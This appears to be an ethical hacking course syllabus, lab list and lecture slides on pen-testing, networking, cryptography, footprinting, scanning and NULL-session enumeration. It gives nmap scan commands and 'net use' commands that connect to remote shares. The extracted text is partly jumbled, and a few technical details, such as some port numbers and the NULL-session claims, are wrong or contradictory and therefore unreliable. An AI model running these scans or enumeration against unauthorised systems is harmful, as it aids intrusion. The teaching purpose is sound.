JCB1603

Ethical Hacking

1
JCB1603 Ethical Hacking
UNIT-I Introduction To Hacking
Introduction to Hacking – Terminologies – Penetration Test – Vulnerability
Assessments versus Penetration Test – Pre-engagement – Rules of
Engagement - Penetration Testing Methodologies – OSSTMM – Categories of
Penetration Test – Types of Penetration Tests – Vulnerability Assessment
Summary – Reports - Red, Blue, and Purple Teams.

UNIT-II Ethical Hacking In Web

Introduction to Ethical Hacking – Foot Printing - Reconnaissance - Scanning
Networks - Enumeration - System - Malware Threats – Sniffing- Social
Engineering - Denial of service - Session Hijacking - Hacking Web Servers -
Web Applications – SQL Injection - Hacking Wireless Networks - Mobile
Platforms.
2
JCB1603 Ethical Hacking
UNIT-III Network Attacks
Vulnerability data resources – Exploit databases –Promiscuous versus Non-
Promiscuous Mode – MITM attacks – ARP attacks –SSL Strip: Stripping https
Traffic - DNSS – ARP Spoofing – DHCP Spoofing - Remote Exploitation –
Attacking Network Remote Services – Overview of Brute Force Attacks.

UNIT-IV Wireless Hacking

Wireless hacking – Air crack- Cracking WEP – WPA/WPA2 Wireless Network
Using Air Crack – Evil Twin Attack – Log-in Protection Mechanisms – Captcha
Validation Flaw – Captcha RESET Flaw – Manipulating User-Agents to Bypass
Captcha.

3
JCB1603 Ethical Hacking
UNIT-V Case Study
Authentication Bypass Attacks – Testing for Vulnerability – Automating with
Burp Suite – Session Attacks – SQL Injection Attacks – XSS (Cross-Site Scripting)
- Types of Cross-Site Scripting – Cross-Site Request Forgery (CSRF) – SSRF
Attacks.

4
JCB1613
Ethical Hacking
Lab

5
JCB1613 Ethical Hacking Lab
A) Ethical Hacking In Web:
Foot printing and Reconnaissance:
Performing Foot Printing using Google Hacking, Website Information,
Information about an archived website,
1. Extract Contents of a Website
2. Trace any Received Email
3. Fetch DNS Information.
B) Malware Threats: Worms, Viruses, Trojans:
1. Use Password Cracking, Dictionary Attacks.
2. Encrypt and Decrypt Passwords.
3. Simulate DoS Attack to Reduce the Speed of Website: Tool- HTTP Flooder.
4. ARP Poisoning in Windows, Ifconfig, ping, netstat, traceroute,
Steganography Tools.
5. Exploit an Attack on Computer System using IP Tools; Reverse IP Attack.
6
JCB1613 Ethical Hacking Lab
C) Developing and Implementing Malwares:
1. Creating a Simple Key logger in Python, Creating a Virus, Creating a Trojan
Scanning Networks, Enumeration and Sniffing,
i). Generate reports using Network port scanning, IDS tools, and sniffing tools.
ii). Practical of Nmap Security Scanner for Network Exploration &
Security Audits.
iii). Network Level Hijacking.

7
JCB1613 Ethical Hacking Lab
D) Ethical Hacking Web Servers, Web Applications:
1. Hacking a Website by Remote File Inclusion, Disguise as Google Bot to view
hidden
Content of a website.
2. Practical on Session Hijacking.
3. Phishing - Practical on Social Engineering.
4. Exploit SQL Injection Vulnerabilities using PySQL - Python Framework or
Similar.
Tools sqlmap.
5. Practical on Cross Site Scripting (XSS).
6. Practical on Server Side Request Forgery (SSRF).
7. Practical on Cross Site Request Forgery (CSRF).
8. Android hacking.
9. Burp Suite, a tool for performing security testing of web applications.
8
JCB1613 Ethical Hacking Lab
E) Wireless Network Hacking:
1. Hacking Wireless Networks: Email Tracker- to Trace the Route of any Email
or Ip:
Tool-Ip Locater, Email_Spidr, Aid4Mail.
2. Wifi Crack- to Crack the Keys of wifi tool- aircrack(linux) cain abel(windows),
Lan
Guard, Wireshark, BurpSuite.

F) Penetration Testing:
1. Penetration Testing using Metasploit.

9
JCB1613 Ethical Hacking Lab
D) Ethical Hacking Web Servers, Web Applications:
1. Hacking a Website by Remote File Inclusion, Disguise as Google Bot to view
hidden
Content of a website.
2. Practical on Session Hijacking.
3. Phishing - Practical on Social Engineering.
4. Exploit SQL Injection Vulnerabilities using PySQL - Python Framework or
Similar.
Tools sqlmap.
5. Practical on Cross Site Scripting (XSS).
6. Practical on Server Side Request Forgery (SSRF).
7. Practical on Cross Site Request Forgery (CSRF).
8. Android hacking.
9. Burp Suite, a tool for performing security testing of web applications.
10
Acknowledgement
we acknowledge this course content areas are used from CyBoK, CSA cloud
security alliance and publically available , open source content. Used for
knowledge sharing to improve cyber security awareness among the users.

CyBOK project is “for the community, by the community”

The Cloud Security Alliance (CSA) is a non-profit organization that brings together experts and
community to build best practices and push forward cybersecurity for everyone.
https://www.isaca.org/

https://www.cybok.org/knowledgebase1_1/

https://www.cisa.gov/

https://attack.mitre.org/

https://github.com/cloudsecurityalliance

https://cloudsecurityalliance.org/

https://learn.microsoft.com/en-us/azure/security/fundamentals/overview
11
1: Introduction to
Ethical Hacking

12
Definition of a Penetration Tester
Sometimes called ethical
hackers though label is less
preferred

People who assess security

of a target
Pen testers are:

Specially trained

People who understand

security concepts

13
What Is a Penetration Tester?
• Can be employed full-time by a company
• May work freelance as a contractor
• Uses the techniques of malicious hackers against a
client
• Tactics and tools of pen tester are the same as a
hacker
• Intent and permission differ

14
Why Use Penetration Testing?
To test and evaluate
Taking on the pen tester security
role and the associated
skillset has become more To ensure compliance
important in today’s world with laws
as organizations have had To perform security
to take a more serious look audits
at their security posture
and how to improve it. To monitor

15
Origins of Penetration Testing
The term hacker is an old one
that can trace its origin back Evolved from traditional hacking
about 50 years to technology
enthusiasts of the 1960s.
Arose from a need to proactively
assess an organization’s security
These individuals were not like
the hackers of today; they were
simply those who were curious Created in response to hacker
and passionate about new activity
technologies and spent time
exploring the inner workings and Increasingly popular with rise in
limitations of early systems. cybercrime

16
Goals of a Penetration Tester

In any organization that

is security minded,
something known as Confidentiality
the CIA triad (or the
core principles of
confidentiality,
integrity, and Availability Integrity
availability) is trying to
be preserved.
17
Goals of a Penetration Tester
Testers work to find
holes in the client’s
environment that
would disrupt the CIA
Disclosure
triad and the way it
functions.

Another way of looking

Disruption Alteration at this is through the
use of something called
the anti-CIA triad.
18
Overview of Pen Testing

Hackers
• Have existed since the 1960s
• Originally technology enthusiasts

Original Hackers
• Tried out new technology
• Pushed boundaries
• Satisfied their curiosity
• Sought out undocumented features
19
Evolution of Internet
Hackers became more prolific and more dangerous not too
long after the availability of the Internet to the general public.

Newer
Introductio First attacks attacks
n of the were Later include
Internet mostly attacks financial
expanded mischievou became fraud,
possibilities s and malicious piracy,
and range benign credit card
theft

20
Opponents
In the “real world,”
Script
hackers tend to be kiddies
broken down into
different categories
to differentiate their Terrorists
White
Hats
skills and intent.
These are the Malicious

different types of
hackers you can
expect to encounter
in the real world. Black Hats Gray Hats

21
Examples of Cybercrimes
Over the past two Identity theft
decades crimes
associated with Theft of service
hacking have
evolved Fraud
tremendously.
Embezzlement
These are some Writing malware
broad categories
of cybercrime. Cyberstalking
22
Target: Apple iCloud
In August 2014, a massive data breach against Apple’s iCloud
was responsible for the public disclosure of hundreds of
celebrity pictures in various intimate moments. This breach
has so far resulted in lawsuits by many of those who had their
pictures stolen as well as a lot of negative publicity for Apple.
• Hackers broke into Apple’s cloud-based storage service.
• Several celebrities had their photos stolen and posted online.
• This breach resulted in numerous ongoing lawsuits.

23
Target 2014
In 2014 Target Corp The breach resulted in loss of
became a victim of a customer data.
large-scale cybercrime.
56 million records were
This breach was compromised during the incident.
responsible for the
The breach resulted in major
disclosure of an lawsuits.
estimated 56 million
different credit card
There was a decrease in business.
accounts.
24
JP Morgan 2014
83 million accounts In October 2014 JP Morgan revealed
compromised to the U.S. Securities and Exchange
Commission (SEC) that 83 million
accounts were compromised. The
Being actively investigated
by SEC in the United States breach is being actively investigated
by the U.S. Secret Service.
Generated numerous
lawsuits Early information points to the
breach being the result of attackers
discovering vulnerabilities in
Loss of customers software on JP Morgan’s own
computer systems.
25
Hacking and the Law

New and old laws apply to hacking.

Technology has outpaced the law.

Increasing amount of cybercrimes.

Cybercrimes have rapidly evolved.

26
Addressing Legal Issues

You will need to You need trust

always ensure that between the client
the utmost care and pen tester.
and concern is The client needs to
have confidence
exercised at all Contract rules will be
times to ensure followed.
that the proper The client needs limits
procedures are and guidelines in the
observed to avoid event they are broken.
legal issues.
27
Sample Laws
1973 US Code of Fair
Sarbanes-Oxley (SOX)
Information Practices

1986 US Electronic
1974 US Privacy Act Communications Privacy
Act

1996 US Health Insurance

1984 US Medical Computer
Cyberlaw and Portability Accounting
Crime Act
Act (HIPAA)

1994 US Communications
1996 US Computer Fraud
Assistance for Law
and Abuse Act
Enforcement Act

Federal Information
Security Management Act
(FISMA)
28
Points to Remember
Remember as a pen tester that the law will impact your
actions and can result in prison time and/or fines if you do
things without permission.
Do not attempt to become an “armchair” lawyer. Rather,
understand that the law has an impact on what you do. Seek
legal assistance if you don’t fully understand the implications.
• The law will impact and guide many penetration tests.
• Seek legal assistance from a lawyer; don’t try to
interpret the law yourself.

29
Pen Testing Process
Once a pen tester is in Follows a series of steps
possession of the
necessary permissions to
Ensures tasks and goals are
conduct their activities, completed properly
the actual testing can
take place. May vary based on need

There are a myriad of

ways to proceed with May be legally mandated
testing at this point, and
each is valid in its own Can be customized in some
cases
way.
30
Pen Testing Process
Reconnaissance Scanning Enumeration

Planting Privilege
System Hacking
Backdoors Escalation

Covering Tracks

31
Conclusion of the Test
Once this is complete, the tester should be prepared to present
a detailed report of their findings. Presenting the report to the
client may be the last task the tester has or there may be
additional steps.
Potential outcomes

Presentation plus
Presentation of the Presentation plus
recommendation
report to the client recommendations
with remediation
32
2: System
Fundamentals

33
Operating Systems
OS requires intimate
The operating familiarity
system provides
Performs diverse
many features, but functions

OS Features
look underneath
Works with
the interface and hardware
you will find the
Acts as platform for
platform all applications
responsible for the
Provides monitoring
applications being and management
executed.
34
Common OS Features
•Graphical User Interface
•Network Support
•Multitasking
•Application Support
•Hardware Interface

35
Microsoft Windows
The majority of the systems will be running
Microsoft Windows in some form.
• The dominate OS
• Debuted in 1980s
• Installed on PCs and other devices
• Installed on 90% of computers

36
Windows Security Issues
• Windows is a huge target because of a large
installed base.
• An endless stream of countless updates are hard
to keep track of.
• The default configurations is left in place by
many consumers.
• A large number of older or legacy systems still
exist.

37
Apple’s Mac OS X
Has replaced
Windows Coexists in
systems in many
some environments
environments
Popular in
environments
Apple’s
where other
proprietary OS
Apple products
exist

38
Issues with Mac OS X
• The security solutions are lacking versus other
platforms.
• There is naivety among users who feel that
vulnerabilities do not exist.
• Features are generally all enabled and ready to
use even if the user is not using them.

39
Linux
• Advanced operating system suited to tech enthusiasts
• Popular among techies, but also useful as a desktop OS
• Popular with pen testers
• Widely used as a server OS

40
Facts About Linux
• Higher level of knowledge required
• Least privilege is the default security model
• Open source allows for scrutiny by public
• Extremely flexible
• Present on many embedded devices

41
Next Step, Networks
A pen tester must understand the dynamics of
networks.

Networks have clients and servers.

Servers provide services and data.

Clients are where users work.

42
Networks Types
Personal Local Municip Wide
Area Area al Area Area
Network Network Network Network
(PAN) (LAN) (MAN) (WAN)

Networks come in four different sizes, with each based on

scale. Knowing each of the different types of networks is
absolutely essential in planning and executing a successful
penetration test.
43
Enter the OSI Model
Stands for Open System Interconnect

Old but useful model

Conceived in 1970s

Defines a common set of rules for vendors of hardware and

software
Useful in placing attacks and other components into proper
context
44
Seven Layers of OSI
Application
Presentation
Session
Transport
Network
Data Link
Physical
45
TCP/IP
A suite of networking protocols used to exchange
information

OSI influenced, but didn’t create TCP/IP

Is one of many network protocols

• Is most popular
• Other protocols are essentially extinct

46
TCP vs. UDP
Transmission Control User Datagram Protocol
Protocol (TCP) (UDP)

Reliable Unreliable

Connection
Connectionless
Oriented

A packet is a chunk of information transmitted over the network

47
TCP Three-Way Handshake

The three-way handshake is a process that TCP uses to

initiate a connection between two points.
48
Working with UDP
Does not have error
User Datagram checking
Protocol or acknowledgments
like TCP

Stateless or
Less overhead than
connectionless
TCP
protocol

49
IP Addresses

An IP address is a unique numeric identifier assigned to a

host.

Hosts are something attached to a network.

A device attached to a network with an IP address is a

host.

Every packet has a source IP and destination IP.

50
Examples of IP Addresses

10.15.1.15 169.254.20.16

192.168.1.1 Some 127.0.0.1

Simple
Examples
of an IP
Address

Each one of these addresses is considered a valid IP address,

and each would be legal in their own individual situation. 51
IP Address Format

Written in dotted
• Separated by periods
decimal format

Four numbers
separated by decimal • 210.168.69.2
points

IP address is made up
• Network, Then Host
of network and host

52
Types of IP Addresses

IP Addresses

Type Assignment

Public Private Static Dynamic

53
Types of IP Addresses

IP
Network Host
Address

Subnetting is the
logical breakdown of
a network address
space into smaller
subnetworks.
54
About Ports
Ports identify and categorize types of traffic.

Each port is associated with a protocol or application.

Ports ensure traffic will end up at the right location.

They are represented in the format 192.168.1.10:80.

55
Port Ranges (TCP and UDP)
TCP and UDP

Well-known ports Registered ports Dynamic ports

1 to 1024 1025 to 49151 49152 to 65535

56
Network Hardware

Networks contain various appliances.

Each controls the flow of traffic.

Having a basic overview of each is essential to a

penetration tester.

57
Routers and Switches
Routers and switches are commonly used devices in networks.

Routers create and connect networks.

Switches create multiple broadcast domains.

A solid understanding of the functions of routers and

switches will give you a substantial edge when ferreting out
information on a target network.
58
What Is a Router?
Directs packets to the proper network and address

Works at the network layer

Works as a gateway between networks

Routers can use Network Address Translation (NAT)

• Used to translate a few public IPs to numerous private IPs

59
Looking at Switches

Deliver data based on hardware or physical address

• MAC addresses are physical addresses in a network card

• Come in the form of six pairs of characters in hexadecimal form
• C0-cb-38-ad-2b-c4

Create collision and broadcast domains

60
Proxies
Protect internal systems

Intermediaries between internal and external networks

Can filter content such as websites or other aspects

Can cache content

61
Firewalls

Control flow of traffic Come in two main types

Caching of content
Packet filtering
Content filtering
Stateful packet
Examine traffic
filtering
headers

62
Placement of a Firewall

63
Intrusion Detection System
Intrusion detection system (IDS)

Detects but doesn’t stop malicious

activity
Can send an alert of logging an
event

Is a passive device

Intrusion prevention systems (IPSs)

are like IDSs but react to activity

64
Cryptography

Chapter 3

65
3:Cryptography

66
Goals of Cryptography

Confidentiality

Integrity

Goals Nonrepudiation

Authentication

67
Uses of Cryptography
Applications of cryptography
Symmetric and asymmetric cryptography
Working with hashing
Purposes of keys
Types of algorithms
Key management issues

68
Understanding Cryptography
• Legal issues
• Financial compliance
• Healthcare regulations
• Defense industries
• Acceptable algorithms
• Key strengths

69
What Is Cryptography?
As information has
Protects
changed and human information

beings have gotten Way of

blocking
smarter, the What
threats to
secrecy
technology has does it
become substantially do? Preserves
the state of
more advanced to information
A constantly
keep up with evolving
body of
changing issues and knowledge

threats.
70
Hieroglyphics as an Example
Intricate Egyptian hieroglyphics had spiritual and
patterns and religious significance
glyphs used in Not designed to preserve secrets
Egyptian
hieroglyphics Used to commune with other world
were commonly Usage restricted to royal family and religious
used for spiritual orders
and religious Could not be deciphered again until 1799
and discovery of Rosetta stone
reasons.

71
Modern Applications of Cryptography
Cryptography has even made some of the everyday
technologies that you use possible.

E-commerce applications Mobile technologies

Couldn’t exist in current

Prevents identity theft
form without
cryptography Stops device
Provides secrecy, duplications
integrity, and
Prevents eavesdropping
authentication
72
Important Terms and How They Work

Plaintext or cleartext

Ciphertext

Algorithms

Keys

73
Introducing Symmetric Cryptography
All algorithms that fit into the symmetric variety use a single
key to both encrypt and decrypt (hence the name symmetric).
• Confidentiality
Symmetric • Speed
systems are
great at • Overall simplicity
• Providing authenticity
Drawbacks of • Key management
symmetric
systems • Lack of non-repudiation capability

74
Examples of Symmetric Algorithms
There are currently a myriad of symmetric algorithms
available; a Google search turns up an endless sea of
alphabet soup of algorithms.
Data Encryption Standard (DES)
Triple DES (3DES)
Blowfish
International Data Encryption Algorithm (IDEA)
RC2, RC4, RC5, RC6
Rijndael or Advanced Encryption Standard (AES)
Twofish
75
Asymmetric or Public Key Cryptography
The concept of public key Uses a key pair consisting of a
cryptography was intended to public key and a private key
overcome key management
problems in previous Ensures non-repudiation
systems.
Can enforce authentication
In the system each user
receives a pair of keys called Solves key management issues
the public key and the private
key. Each person’s public key Is slower compared to symmetric
is published, whereas the systems
private key is kept secret.
76
Asymmetric Encryption
Encryption
Hello Algorithm $%@@!

Key 1
Decryption
$%@@! Algorithm Hello

Key 2
77
About that Hash
A hash is a one-way function
Can be computed in one direction and not the other
Is a fixed length
Creates a unique output for every input

78
Hashing Algorithms
Hashing is used to detect changes in information: anything
that is hashed and then changed, even a small amount, will
result in an entirely different hash from the original.
Message Digest 2 (MD2)
Message Digest 4 (MD4)
Message Digest 5 (MD5)
Message Digest 6 (MD6)
HAVAL
RIPE-MD
Secure Hash Algorithm-0 (SHA-0)
Secure Hash Algorithm-1 (SHA-1)
Secure Hash Algorithm-2 (SHA-2)
79
Hashing in Digital Signatures
Zelda decrypts the
Seeing who the
hash value, thus
Sean creates a sender is, Zelda
validating the
message. retrieves Sean’s
identity of the
public key.
sender.

Zelda reruns the

Zelda sees that the
Sean hashes the algorithm against
message came from
message. the plaintext and
Sean.
compares the two.

Sean encrypts the Sean sends the If the hashes match,

hash with his private combination to the message has not
key. Zelda. been altered.
80
The Role of Digital Certificates
A digital certificate
complements or Digital certificates establish ownership
replaces other forms of a key
of authentication.
Can be attached to a person,
computer, or service
A user who presents
the credential must Certificates are issued under specific
have a method in rules
place that allows for
the credential to be Used in many applications such as e-
validated. commerce

81
Certification Authorities
A certification authority (CA) handles digital
certificates.

A CA can revoke a certificate.

A CA will validate a certificate.

Trusted third party is a name used to describe a CA.

82
Building a PKI System

83
Applications of Cryptography: IPSec

Internet Protocol Security (IPSec) protects data

during transmission

Operates at the Network layer

Very widely used

Present in virtual private networks (VPN)

84
Applications of Cryptography PGP

Designed to provide security in online

communications

Similar to public and private key encryption

Is used to both sign and encrypt

communications
Can be used to protect data files on hard drive or
other media
85
Applications of Cryptography: Secure Sockets Layer
Developed by Netscape in
1990s

Standard for exchanging

secure data

Encrypts information prior

to transmission

Decrypts upon receipt

Combines asymmetric and

symmetric systems
86
Summary
• Understanding cryptography is important to
progressing into pen testing.
• Cryptography keeps data and services safe.
• Cryptography provides confidentiality, integrity,
non-repudiation, and authentication services.
• Technologies such as SSL, IPSec and others
would not be possible without cryptography.

87
4: Footprinting

88
Losing Control of Information
•Business loss
•Information leakage
•Privacy loss
•Corporate espionage

89
What Is Footprinting?
The process of Process of researching a target carefully and looking
researching and for useful information
uncovering details
about your target Uncovering detailed information
will take some time
to complete, but Looking for information that may be useful during
the time will be later steps
well spent if it Using publically available resources to gain
helps you refine information
your actions later
Looking for carelessly or thoughtlessly shared
to make them more information in places such as social networking sites
effective.
90
What Types of Information to Look For?
• Technical sources such as network information,
applications, IP address ranges, and device information
• Administrative information such as organizational
structure, policies, hiring procedures, employee
information, phone directories, and more
• Physical details such as location data, facility data,
people details, and social interactions

91
How to Gather Information

Passive methods are those that do not interact with the

target.

Active methods are those that directly engage the target such
as using phone calls.

Open source intelligence (OSINT) consists of those sources

such as newspapers, websites, press releases, and other
sources.
92
Examining a Company’s Website

Look for e-mail addresses that may tell more about a specific
individual.

Try to find a physical address (can be useful when looking

up a location on mapping services or Google’s streetview).

Careers and job skills required can reveal a company’s

internal needs.

Product, project, or service information.

93
Examining a Website Offline
Downloading
content to a local
Examining a website can be made easier
drive allows for a
much closer and
by copying it to a local drive.
detailed
examination of Allows you to search the files and
website content information within at your leisure.
than may be
possible when Website downloaders are designed to
viewing the perform this task.
website online
through a browser.
94
What Can BlackWidow Do?
• What can it
download?
• Scriptable
• Network Spy
• Snapshot of web
pages
• Scan filters
• Support for
customizable scans
95
Downloading Sites with Wget

Stands for Web Get

Is available on just about

every major platform

Is noninteractive

Can work with slow or

unreliable networks

96
What Else to Learn from a Website

What about subdomains? Subdomains are a

Try locating a child of a website
division the main website
such as beta.microsoft.com. name.
Subdomains are common but not
always easily detectable For example, a
subdomain of
They can be used to hide content.
Microsoft.com would be
They can also be used to delegate support.microsoft.com
control to parts of a company. or beta.microsoft.com.
97
Finding Old Versions of Websites
• Sometimes an old and
long since removed
version of a website
needs to be located.
• Using Archive.org these
websites can be located.
• Archive.org features the
Wayback Machine for
viewing old sites.
• Can be useful in locating
information that a
company realized was a
bad idea to publish and
removed.
98
What About Google?

Search engines provide quick access

to information, but not all.

Search engines show only a small

fraction of available information.

Additional information is
available with extra effort.

Google hacking is used to retrieve

this hidden information.

99
Google Hacking Keywords
cache will display the version of a web page that Google contains in its
cache.
• Usage: cache:<website name>
link is used to list any web pages that contain links to the page in the
query.
• Usage: link:<website name>
site will restrict the search to the location specified.
• Usage: <keyword> site:<website name>
allintitle will return pages with specified keywords in their title.
• Usage: allintitle:<keywords>
allinurl will only return results with the specific query in the URL.
• Usage: allinurl:<keywords> 100
Using Google Alerts
Alerts are a feature present in many search engines that
notify you when something that fits your search criteria has
been posted.
• Google alerts are a customized automated search.
• They can be built to look for details that are useful.
• They can be used to keep an eye on a search while you
work on other tasks.
• Up to 1,000 alerts can be assigned to an e-mail address.

101
Searching for People
Spokeo: www.spokeo.com
Pipl: www.pipl.com
Yasni: www.yasni.com
Zabasearch: www.zabasearch.com
Intelius: www.intelius.com
ZoomInfo: www.zoominfo.com
Infospace: www.infospace.com
KGB: www.kgbpeople.com
People: www.peepdb.com
Radaris: www.radaris.com

102
Determining Location
•Google
Earth
•Google
Maps
•Google
Streetview
•Webcams

103
Using Social Networking
Because of the nature Useful tool for information gathering
of these services and
their tendency to skew Common to encounter over-sharing of
information accidentally or deliberately
toward openness and
ease of sharing
Easy to encounter information leakage
information, an
attacker does not have
to put in a tremendous Drawback is openness of networks
amount of work to
learn useful details. Easy to collect information
104
Popular Social Networking Sites
There are several
social networks you
can use to search for Facebook Twitter Google+
information, each
with its own built-in
Instagra
search function LinkedIn
m
Tumblr

allowing you to read

people’s information.
YouTube
In addition, we also
locate it based on
geographic data. 105
Using Echosec to Mine Social Networking
Services such as Facebook, Twitter, and Instagram can include
information from the GPS included in your smartphone or use
location services on your laptop or tablet to embed location data.

YouTube
Twitter
Foursquare
Instagram
Picasa
Panaramio
Flickr
106
Looking Up Financial Information
Services such as Yahoo, Google, CNBC, Financial data can reveal useful
Usatoday, and countless others information about a company.
provide information about a company
Public companies can be searched via
that may not be readily available stock symbol.
through other means.
Competitors may also have useful
information about the target.

Look for a company’s partners.

Look up press releases.

Find office locations.

107
Using Job Sites
If you have browsed job postings,
you have undoubtedly noticed the Job requirements and experience
myriad of forms these things take,
but one of the common items is
the skills and experience section. Employer profile

Employee profile

Hardware information

Software information

108
Working with Email as an Information Source
For a malicious party
Value is in email’s content and volume
and a pen tester, the
information carried
Politemail can allow for the
by this medium is tracking of information
staggering and is
valuable to an WhoReadMe can also allow for the
attacker looking for tracking of email
information of all
OS, browser type, and installed
types. ActiveX controls can be found in email

109
Using Whois
Whois is a utility designed to allow
Cross-platform utility for
you to collect information about a looking up domain
domain name or web address. information

Can collect information

that may not be located
elsewhere
Whois
Includes address
information, phone
numbers, names, and
nameserver information

Should be cross-checked
as information may be
anonymous
110
Social Engineering
Inside every environment is the human being. This is in most cases
the weakest and easiest component to target. Human beings tend
to be one of the easiest places to extract information from.
• Baiting
• Phishing
• Spear phishing
• Pretexting
• Tailgating
• Eavesdropping
• Shoulder surfing
• Dumpster diving 111
Summary
• Wealth of resources for gaining information.
• Most are easily accessible.
• Research should be meticulous.
• A healthy amount of time should be spent on footprinting.
• Thorough research will pay off later.
• Be mindful of documentation.

112
5: Scanning

113
The Role of Scanning
Each scan type is like a piece of a larger puzzle that
can be assembled to gain a clearer view of the overall
target.
• Ping sweep
• Port scanning
• Vulnerability scanning

114
Getting Started with Scanning
Network scanning is an
IP addresses of live systems
intense and methodical
process of uncovering Lists of open and closed ports
the structure of the
Operating system versions
network and hosts on
it. MAC addresses

The information Service information

gathered here can Port data
refine the enumeration
process later. 115
Target Up or Down
Important to locate which systems are online

Not every address in a range of IP addresses is

“on”
Need to eliminate systems that are off from
those that are on
Scans to locate “on” or “off” systems are called
ping sweeps or ICMP scans

A quick way to check for live systems is to use the

ping function to perform a ping sweep or ICMP
scan. Pinging is the process of using the ping
command to ascertain the status of a given system,
specifically if it is responsive or not.
116
What Does a Ping Look Like?

Ping is a common network

diagnostic utility
Used to diagnose network problems

Present in every operating system

Ping is used diagnostically to ensure that Uses the Internet Control Message
the host computer the user is trying to Protocol (ICMP)
reach is actually operating. Ping works Sends a packet to a remote system
and waits for a response
by sending an Internet Control Message
Protocol (ICMP) Echo Request to a If no response within a set time, the
target is listed as unreachable
specified interface on the network and
waiting for a reply. 117
Angry IP Scanner
• Common scanner used to perform ping scans
• Can scan a range of IP addresses and their ports
• Pings each address to determine whether it’s alive
• Can scan a range of IP addresses extremely fast
• Can save results to a file for later use

118
Introducing NMAP
The utility is used for everything
from performing network Flexible
inventory to security auditing as Powerful
well as monitoring systems.
Portable
Easy
Free
Well documented
Supported
119
What Is a Port Scan?
Used to identify the open and
closed ports on a system
A port is a virtual endpoint on a
system
Examples are port 80 for HTTP and
21 for FTP
Port scanning has legitimate uses in When combined with an IP
address, they form a socket
managing networks, but port
scanning also can be malicious in A socket identifies which service to
connect to on a system
nature if someone is looking for a
weakened access point to break Port scans allow an attacker to
locate potential entry points
into your computer. 120
TCP and the Three-Way Handshake
TCP establishes connections
Ports can be TCP or UDP.
and then verifies that each and
every packet makes it to their
destination in the right order. TCP is a connection-oriented protocol.
To accomplish this, TCP uses
The three-way handshake is used to establish
the three-way handshake. a connection.
The completion of three-way handshake is
used before sending packets.
The three-way handshake does not handle
security.
TCP also provides sequence numbers for the
reassembly of data.
121
User Datagram Protocol (UDP)

No
Much like
UDP does not guarantees Advantage
UDP is TCP, UDP
make that data is low
stateless sends
connections will arrive at overhead
packets
destination

122
TCP Flags

SYN: Used to initiate a connection between two different

hosts in order to facilitate communications
ACK: Used to acknowledge the receipt of a packet of
information
URG: States that the data contained in the packet should be
processed immediately
PSH: Instructs the sending system to send all buffered data
immediately
FIN: Tells the remote system that no more information will
be sent. In essence this is gracefully closing a connection.
RST: Represents a reset packet that is used to reset a
connection.

123
TCP Full Connect Scan
Utilizes the three-way handshake

Completed handshake indicates open port

Incomplete handshake indicates closed

Scan gives most accurate picture of port status

Drawback is scan can be easily logged

nmap –sT–v <target IP address>

124
Half Open Scans

Starts like full connect scan

Scan does not complete the final

step of the handshake

Benefit is scan has lower chance

of being logged

Scan tends to be faster than full

connect

nmap –sS –v <target IP address>

125
XMAS Scan
A packet is sent with PSH, URG, and FIN all
set at once

Combination of flags is illogical and illegal

Some software developers do not

implement TCP correctly

Does not work on most modern systems

nmap –sX –v <target IP address>

126
FIN Scan
Occurs when a packet is sent with the FIN
flag set

Used to determine whether ports are open

or closed

May not function on newer targets

Can be blocked by some firewalls

127
Fragmenting

Fragmenting breaks up
packets

Is reassembled by target

Packets are fragmented

when they exceed a
network’s MTU

Fragmenting can be used

to evade detection
128
Banner Grabbing
Banner grabbing is an activity that is
used to determine information about Used to identify a system and
services that are being run on a services
remote computer.
Retrieves information from
open ports and services

Services respond to banner

grabs with application-
specific information

Can use Telnet of SSH to

perform this task

129
Vulnerability Scanners
These tools Used to identify known vulnerabilities
function by
checking coding, Not typically stealthy
ports, variables,
Generally performed by automated
banners, and many means
other potential
May only catch problems that are
problems areas already known
looking for issues.
Not a good choice if trying to simulate
an attack
130
Providing Cover with Proxies

A proxy can lower chances of

detection

Routes traffic through a

machine acting as proxy

Can perform content

filtering

Can provide anonymizing

services

131
Summary
• Scanning requires a good understanding of
networking technologies.
• Enumeration follows scanning.
• Enumeration seeks to reveal information
from a system.
• Enumeration is an active measure.
• Information can include usernames, group
information, printer data, and other data.

132
6: Enumeration

133
What Is Enumeration?

Gathers detailed information beyond scanning

Uses different protocols such as ICMP and SNMP

Can create effective picture of network

Relies on both manual and automated methods

134
Enumeration
You can expect to gain Network resources and shares
even more information
during this step as you are Users and groups
digging deeper and
gathering information Routing tables
such as usernames, host
Auditing and service settings
names, share names,
services, application data, Applications and banners
group information, and
much more. SNMP and DNS details
135
What to Uncover and How
The process of enumeration is finding out about what
services are running, including versions, open shares,
account details, or possible points of entry. One such target
is SMB.

Using NULL Enumerating

sessions to Active Targeting
extract Directory routers
information accounts

136
Ports of Interest
• TCP 53: This is used for DNS zone transfers.
• TCP 135: This is used by email clients to connect to email servers.
• TCP 137: NBNS provides name resolution services for the NetBIOS
protocol.
• TCP 139: This is for NetBIOS Session Service or SMB over NetBIOS.
• TCP 445: SMB over TCP or Direct Host improves network access.
• UDP 161: SNMP is a protocol used for network management.
• TCP/UDP 389: LDAP is used by many directory applications.
• TCP / UDP 3368: This is the Global Catalog Service associated with Active
Directory.
• TCP 25: SMTP is used for the transmission of messages.

137
NetBIOS
Commonly exploited service

Designed for small networks

This service was
originally intended Is extremely vulnerable
to assist in the Can be used to extract all sorts of information
access to resources from a target
on a LAN only. Considered a legacy protocol

Still available and running on Windows systems by

default

138
NULL Sessions and NetBIOS
This feature is used to allow clients or endpoints of a connection to access
certain types of information across the network.

List of
List of
users and
machines
groups

Users
List of
and host
shares
SIDs

The NULL session allows access to a system using a special account

known as a NULL user. The account can be used to reveal information
about system shares or user accounts while not requiring a username or
password to do so.
139
Working with NULL Sessions

NULL sessions can be used to retrieve extreme amounts of information.

Information includes user IDs, share names, security policy settings, users
currently logged in, and more.

Windows XP and Windows Server 2003 are not vulnerable to null session
attacks.

Patches won’t fix the issue, and most hardening techniques won’t keep it
from being exploited.

140
Using a NULL Session
• Requires a short list of commands
• Main command is the “net” command
• To connect to a remote session, use:
• net use \\<machine name> “/user:”
• To view shares on a remote system, use:
• net view \\<machine name>
• To connect to a remote share, use:
• net use <drive letter> \\<machine name>\<shared folder
name>

141
Extracting from SNMP
SNMPWalk is an open source
Retrieves information from SNMP
tool that was part of the Net-
SNMP project at Carnegie
Mellon University in the early
Preys upon plaintext information
1990s when SNMP was first
deployed.
Queries devices to determine if
information is kept secret

SNMP is open source and can

inform administrators

142
PsTools Suite for Enumeration

PsTools made by Systernals (now Microsoft)

Patterned after UNIX commands

Tools allow for detailed exploration of a remote system

Can perform many actions and tasks

